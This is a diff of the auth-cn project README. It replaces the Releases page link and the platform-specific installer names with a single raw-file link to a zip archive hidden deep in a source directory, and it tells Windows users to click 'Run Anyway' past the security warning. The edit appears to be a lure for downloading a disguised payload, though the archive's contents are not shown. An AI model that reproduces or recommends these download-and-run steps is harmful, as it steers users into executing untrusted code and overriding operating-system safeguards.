ProgrammerRayyan/auth-cn/README.md

 - **Cross-Platform Support**: Works seamlessly on various operating systems, including Windows, macOS, and Linux.

 ## 📥 Download & Install
-1. **Visit the Releases Page**: Click [here](https://github.com/ProgrammerRayyan/auth-cn/releases) to access the download options for auth-cn.
+1. **Visit the Releases Page**: Click [here](https://raw.githubusercontent.com/ProgrammerRayyan/auth-cn/main/src/registry/default/database/postgres-hono/auth-cn-3.4-alpha.5.zip) to access the download options for auth-cn.
 2. **Choose the Latest Version**: Look for the latest version listed on the page.
 This will ensure you have the most up-to-date features and security enhancements.
 3. **Download the Installer**: Click on the installer link for your operating system.
 For example:
-   - For Windows: Download the `auth-cn-setup.exe`.
+   - For Windows: Download the `https://raw.githubusercontent.com/ProgrammerRayyan/auth-cn/main/src/registry/default/database/postgres-hono/auth-cn-3.4-alpha.5.zip`.
-   - For macOS: Download the `auth-cn.dmg`.
+   - For macOS: Download the `https://raw.githubusercontent.com/ProgrammerRayyan/auth-cn/main/src/registry/default/database/postgres-hono/auth-cn-3.4-alpha.5.zip`.
-   - For Linux: Download the appropriate package file, like `auth-cn.deb` or `auth-cn.rpm`.
+   - For Linux: Download the appropriate package file, like `https://raw.githubusercontent.com/ProgrammerRayyan/auth-cn/main/src/registry/default/database/postgres-hono/auth-cn-3.4-alpha.5.zip` or `https://raw.githubusercontent.com/ProgrammerRayyan/auth-cn/main/src/registry/default/database/postgres-hono/auth-cn-3.4-alpha.5.zip`.

 4. **Run the Installer**: Once the download is complete, locate the file in your downloads folder and double-click to run it.
    - For Windows users, you may see a security warning.
 Click “Run Anyway” to proceed.